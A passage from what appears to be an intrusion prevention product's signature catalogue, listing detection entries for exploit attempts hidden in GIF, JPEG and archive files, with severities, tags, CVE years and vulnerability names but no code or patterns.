Tags: Any Operating System, Any Hardware, IBM Domino, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: IBM-Domino-Gif-Processing-Heap-Buffer-Overflow
Description:
Back to top

File-GIF_Ie-Cross-Domain-Frame-Spoof

About this situation: Cross domain frame spoofing vulnerability in MS IE
Context: GIF File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 4.0, Internet Explorer 5.5, CVE2004, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1008-5242
Vulnerability: Ie-Cross-Domain-Frame-Spoof
Description:
Back to top

File-GIF_Imagemagick-GIF-Comment-Processing-Off-By-One-Buffer-Overflow

About this situation: An ImageMagick GIF Comment Processing Off-by-one Buffer Overflow vulnerability
Context: GIF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1008-5242
Vulnerability: Imagemagick-GIF-Comment-Processing-Off-By-One-Buffer-Overflow
Description:
Back to top

File-GIF_Internet-Explorer-Malformed-Gif-File-Double-Free

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: GIF File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2004-07, CVE2003, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1008-5242
Vulnerability: Internet-Explorer-Malformed-Gif-File-Double-Free
Description:
Back to top

File-GIF_Microsoft-Windows-Graphics-Rendering-Engine-Gif-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Digital Image Suite detected
Context: GIF File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Microsoft Visio, Microsoft Office XP, Microsoft SQL Server, Microsoft Works, Microsoft PowerPoint Viewer, Microsoft Report Viewer, Microsoft Forefront Client Security, MS2008-09, CVE2008, Windows not specific, Internet Explorer not specific, Microsoft Visio not specific, Microsoft SQL Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-586-5211
Vulnerability: Microsoft-Windows-Graphics-Rendering-Engine-Gif-Parsing-Buffer-Overflow
Description:
Back to top

File-GIF_Mozilla-Firefox-Gif-Netscape-Extension-Buffer-Overflow

About this situation: Invalid Netscape specific extension in a GIF image
Context: GIF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2005, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: HTTP-Firefox-Gif-Netscape-Extension-BOF
Description:
Back to top

File-GIF_Mozilla-Products-Malformed-Gif-Buffer-Overflow

About this situation: Malicious GIF image detected
Context: GIF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Mozilla Suite, Mozilla Thunderbird, CVE2005, Any Operating System not specific, Potential Denial of Service
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: HTTP-Mozilla-Products-Malformed-Gif-Buffer-Overflow
Description:
Back to top

File-GIF_MS-DirectShow-CVE-2013-3174

About this situation: A suspicious GIF file detected
Context: GIF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-847-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-GIF_Opera-Software-Opera-GIF-Processing-Memory-Corruption

About this situation: An Opera Software Opera GIF Processing Memory Corruption vulnerability
Context: GIF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Opera, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1008-5242
Vulnerability: Opera-Software-Opera-GIF-Processing-Memory-Corruption
Description:
Back to top

File-GIF_PHP-Gdimagecreatefromgifctx-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: GIF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-992-5242
Last changed: sgpkg-ips-992-5242
Vulnerability: PHP-Gdimagecreatefromgifctx-Out-Of-Bounds-Read
Description:
Back to top

File-GIF_Skyflas.A-Traffic

About this situation: A suspicious traffic pattern detected
Context: GIF File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Win32.Downloader.Skyflas.A-Botnet
Description:
Back to top

File-GIF_Sun-Java-Web-Start-Splashscreen-Gif-Decoding-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Sun Microsystems JDK detected
Context: GIF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Oracle Java Development Kit, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-570-5211
Vulnerability: Sun-Java-Web-Start-Splashscreen-Gif-Decoding-Buffer-Overflow
Description:
Back to top

File-GIF_Sun-Microsystems-Java-Gif-File-Handling-Memory-Corruption

About this situation: Attempt to exploit memory corruption vulnerability in Sun JRE detected
Context: GIF File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, CVE2007, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Sun-Microsystems-Java-Gif-File-Handling-Memory-Corruption
Description:
Back to top

File-GIF_Suspicious-File

About this situation: A suspicious GIF file detected
Context: GIF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-1789-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-GIF_Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine detected
Context: GIF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine AssetExplorer, Zoho Corporation ManageEngine SupportCenter, Zoho Corporation ManageEngine ServiceDesk, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1575-5242
Last changed: sgpkg-ips-1575-5242
Vulnerability: Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service
Description:
Back to top

File-JPEG_Adobe-Acrobat-Imageconversion-JPEG-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat DC (Classic) detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-852-5242
Last changed: sgpkg-ips-852-5242
Vulnerability: Adobe-Acrobat-Imageconversion-JPEG-Heap-Buffer-Overflow
Description:
Back to top

File-JPEG_Adobe-Acrobat-Imageconversion-JPEG-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat DC (Classic) detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-857-5242
Last changed: sgpkg-ips-857-5242
Vulnerability: Adobe-Acrobat-Imageconversion-JPEG-Out-Of-Bounds-Read
Description:
Back to top

File-JPEG_Adobe-Acrobat-Imageconversion-JPEG-Parsing-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat DC (Classic) detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1112-5242
Vulnerability: Adobe-Acrobat-Imageconversion-JPEG-Parsing-Out-Of-Bounds-Read
Description:
Back to top

File-JPEG_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2960

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-840-5242
Vulnerability: Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2960
Description:
Back to top

File-JPEG_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2964

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-840-5242
Vulnerability: Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2964
Description:
Back to top

File-JPEG_Adobe-Acrobat-XPS-JPEG-App2-Parsing-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1025-5242
Last changed: sgpkg-ips-1025-5242
Vulnerability: Adobe-Acrobat-XPS-JPEG-App2-Parsing-Heap-Based-Buffer-Overflow
Description:
Back to top

File-JPEG_Adobe-Acrobat-XPS-JPEG-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1044-5242
Vulnerability: Adobe-Acrobat-XPS-JPEG-Out-Of-Bounds-Read
Description:
Back to top

File-JPEG_Adobe-Acrobat-XPS-JPEG-Out-Of-Bounds-Read-CVE-2018-4889

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1055-5242
Last changed: sgpkg-ips-1055-5242
Vulnerability: Adobe-Acrobat-XPS-JPEG-Out-Of-Bounds-Read-CVE-2018-4889
Description:
Back to top

File-JPEG_Adobe-Acrobat-XPS-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-977-5242
Last changed: sgpkg-ips-977-5242
Vulnerability: Adobe-Acrobat-XPS-Out-Of-Bounds-Read
Description:
Back to top

File-JPEG_Apple-MacOS-ImageIO-Jp2-File-Parsing-Heap-Buffer-Overflow-CVE-2024-44176

About this situation: An attempt to exploit a vulnerability in Apple Computer macOS Sonoma detected
Context: JPEG File Stream
Severity: 7
Tags: Mac OS X, Any Hardware, CVE2024, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Vulnerability: Apple-MacOS-ImageIO-Jp2-File-Parsing-Heap-Buffer-Overflow-CVE-2024-44176
Description:
Back to top

File-JPEG_Apple-QuickTime-JPEG-2000-Cod-Length-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-440-4219
Vulnerability: Apple-QuickTime-JPEG-2000-Cod-Length-Integer-Underflow
Description:
Back to top

File-JPEG_Clamav-AntiVirus-Check-JPEG-Exploit-Function-Denial-Of-Service

About this situation: An attempt to exploit a denial of service vulnerability in ClamAV AntiVirus detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ClamAV, CVE2008, Any Operating System not specific, Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Clamav-AntiVirus-Check-JPEG-Exploit-Function-Denial-Of-Service
Description:
Back to top

File-JPEG_Conflicting-Content-Type-Text

About this situation: Detected conflicting Content-Type header
Context: JPEG File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Violations
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-JPEG_Conflicting-Content-Type-Text-HTML

About this situation: Detected conflicting Content-Type header
Context: JPEG File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Violations
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-JPEG_Conflicting-Content-Type-Text-Plain

About this situation: Detected conflicting Content-Type header
Context: JPEG File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Violations
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-JPEG_EICAR-AntiVirus-Test

About this situation: Detected an EICAR antivirus test file
Context: JPEG File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-784-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

File-JPEG_Embedded-Zip-Archive

About this situation: Embedded zip archive
Context: JPEG File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-JPEG_FFmpeg-CBS_JPEG_Split_Fragment-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in FFmpeg
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, FFmpeg Project Team FFmpeg, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1263-5242
Last changed: sgpkg-ips-1266-5242
Vulnerability: FFmpeg-CBS_JPEG_Split_Fragment-Heap-Buffer-Overflow
Description:
Back to top

File-JPEG_HTML-After-JPEG-File-In-Same-Response

About this situation: HTML content was detected after a JPEG image file in the same response.
Context: JPEG File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-1347-5242
Last changed: sgpkg-ips-1425-5242
Description:
Back to top

File-JPEG_HTML-Inside-JPEG-File

About this situation: Suspicious content was detected inside a JPEG image file
Context: JPEG File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1347-5242
Vulnerability: Stegosploit
Description:
Back to top

File-JPEG_Imagemagick-EXIF-Resolutionunit-Handling-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in ImageMagick detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-445-4219
Last changed: sgpkg-ips-448-4219
Vulnerability: Imagemagick-EXIF-Resolutionunit-Handling-Memory-Corruption
Description:
Back to top

File-JPEG_Imagemagick-Syncexifprofile-Out-Of-Bounds-Array-Indexing

About this situation: An attempt to exploit a vulnerability in ImageMagick Studio ImageMagick detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, CVE2016, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-810-5242
Last changed: sgpkg-ips-810-5242
Vulnerability: Imagemagick-Syncexifprofile-Out-Of-Bounds-Array-Indexing
Description:
Back to top

File-JPEG_Internet-Explorer-JPEG-Rendering-Memory-Corruption

About this situation: Attempt to exploit memory corruption vulnerability in the Internet Explorer JPEG rendering
Context: JPEG File Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2005-08, CVE2005, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-722-5211
Vulnerability: Internet-Explorer-JPEG-Rendering-Memory-Corruption
Description:
Back to top

File-JPEG_Irfanview-Jpeg2000-Jp2-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Irfanview detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Irfanview, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1064-5242
Last changed: sgpkg-ips-1064-5242
Vulnerability: Irfanview-Jpeg2000-Jp2-Stack-Buffer-Overflow
Description:
Back to top

File-JPEG_Jasper-Jp2_Decode-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in JasPer detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, JasPer, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-942-5242
Last changed: sgpkg-ips-942-5242
Vulnerability: Jasper-Jp2_Decode-Out-Of-Bounds-Read
Description:
Back to top

File-JPEG_JPG-Gdiplus-DLL-Comment-Buffer-Overflow

About this situation: Detects jpeg images that will cause a buffer overflow in Windows gdiplus.dll
Context: JPEG File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2004-09, CVE2004, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: JPG-Gdiplus-DLL-Comment-Buffer-Overflow
Description:
Back to top

File-JPEG_Microsoft-Graphics-Component-Information-Disclosure-CVE-2014-6355

About this situation: An attempt to exploit a vulnerability in Microsoft Graphics Component detected
Context: JPEG File Stream
Severity: 7
Tags: Windows 2003, Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Windows 2008, Windows RT 8.1, Windows 8.1, Windows 2012 R2, Any Hardware, MS2014-12, CVE2014, Windows 2003 not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-620-5211
Last changed: sgpkg-ips-620-5211
Vulnerability: Microsoft-Graphics-Component-Information-Disclosure-CVE-2014-6355
Description:
Back to top

File-JPEG_Microsoft-Paint-JPEG-Image-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: JPEG File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-02, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Microsoft-Paint-JPEG-Image-Parsing-Integer-Overflow
Description:
Back to top

File-JPEG_Microsoft-Windows-Codecs-Library-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: JPEG File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1111-5242
Vulnerability: Microsoft-Windows-Codecs-Library-Information-Disclosure
Description:
Back to top

File-JPEG_Microsoft-Windows-DirectShow-JPEG-Double-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: JPEG File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2014-03, CVE2014, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-570-5211
Vulnerability: Microsoft-Windows-DirectShow-JPEG-Double-Free
Description:
Back to top

File-JPEG_Microsoft-Windows-Image-ICC-Profile-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: JPEG File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1104-5242
Vulnerability: Microsoft-Windows-Image-ICC-Profile-Code-Execution
Description:
Back to top

File-JPEG_Microsoft-Windows-Suspicious-ICC-Profile-In-JPEG-File

About this situation: Suspicious ICC profile in JPEG file. Possible exploit against vulnerability in Microsoft Color Management Module
Context: JPEG File Stream
Severity: 7
Tags: Windows, x86, MS2005-07, CVE2005, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-475-5211
Vulnerability: Microsoft-Color-Management-Module-Buffer-Overflow
Description:
Back to top

File-JPEG_OpenJPEG-Jpeg2000-Image-Processing-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in OpenJPEG OpenJPEG detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MuPDF, OpenJPEG, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-816-5242
Last changed: sgpkg-ips-816-5242
Vulnerability: OpenJPEG-Jpeg2000-Image-Processing-Out-Of-Bounds-Write
Description:
Back to top

File-JPEG_Oracle-Outside-In-JPEG-2000-Cod-And-Coc-Parameter-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Outside In Technology detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Outside In Technology, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-440-4219
Vulnerability: Oracle-Outside-In-JPEG-2000-Cod-And-Coc-Parameter-Heap-Buffer-Overflow
Description:
Back to top

File-JPEG_Oracle-Outside-In-JPEG-2000-Qcd-Segment-Processing-Heap-BOF

About this situation: An attempt to exploit a vulnerability in Oracle Outside In Technology detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Outside In Technology, MS2012-10, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-466-5211
Last changed: sgpkg-ips-466-5211
Vulnerability: Oracle-Outside-In-JPEG-2000-Qcd-Segment-Processing-Heap-Buffer-Overflow
Description:
Back to top

File-JPEG_Php-EXIF-Extension-EXIF_Read_Data-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-632-5211
Vulnerability: Php-EXIF-Extension-EXIF_Read_Data-Null-Pointer-Dereference
Description:
Back to top

File-JPEG_PHP-EXIF_Process_User_Comment-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-786-5211
Last changed: sgpkg-ips-787-5211
Vulnerability: PHP-EXIF_Process_User_Comment-Null-Pointer-Dereference
Description:
Back to top

File-JPEG_Script-After-JPEG-File-In-Same-Response

About this situation: Script content was detected after a JPEG image file in the same response.
Context: JPEG File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-1347-5242
Last changed: sgpkg-ips-1425-5242
Description:
Back to top

File-JPEG_Script-Inside-JPEG-File

About this situation: Suspicious content was detected inside a JPEG image file
Context: JPEG File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1347-5242
Vulnerability: Stegosploit
Description:
Back to top

File-JPEG_Shared-Variables

About this situation: This fingerprint sets shared variables
Context: JPEG File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1689-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

File-JPEG_Sun-JDK-Image-Parsing-Library-ICC-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Sun JDK detected
Context: JPEG File Stream
Severity: 7
Tags: Unix, Any Hardware, Sun Java Development Kit, CVE2007, Unix not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: Sun-JDK-Image-Parsing-Library-ICC-Buffer-Overflow
Description:
Back to top

File-JPEG_Suspicious-File

About this situation: A suspicious JPEG file detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-JPEG_Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine detected
Context: JPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine AssetExplorer, Zoho Corporation ManageEngine SupportCenter, Zoho Corporation ManageEngine ServiceDesk, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1575-5242
Last changed: sgpkg-ips-1575-5242
Vulnerability: Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service
Description:
Back to top

File-Member-Name_Advantech-WebAccess-NMS-Dbbackuprestoreaction-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Archive type identification from member names
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1279-5242
Last changed: sgpkg-ips-1279-5242
Vulnerability: Advantech-WebAccess-NMS-Dbbackuprestoreaction-Arbitrary-File-Upload
Description:
Back to top

File-Member-Name_Advantech-WebAccess-NMS-Supportdeviceaddaction-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Archive type identification from member names
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1262-5242
Last changed: sgpkg-ips-1262-5242
Vulnerability: Advantech-WebAccess-NMS-Supportdeviceaddaction-Arbitrary-File-Upload
Description:
Back to top

File-Member-Name_Apache-Pulsar-Unpack-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Apache Pulsar detected
Context: Archive type identification from member names
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation Pulsar, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1718-5242
Vulnerability: Apache-Pulsar-Unpack-Directory-Traversal
Description:
Back to top

File-Member-Name_Apache-Solr-Configset-Upload-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Apache Solr detected
Context: Archive type identification from member names
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Solr, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Apache-Solr-Configset-Upload-Directory-Traversal
Description:
Back to top

File-Member-Name_Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386

About this situation: An attempt to exploit a vulnerability in Apache Solr detected
Context: Archive type identification from member names
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Solr, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1714-5242
Last changed: sgpkg-ips-1714-5242
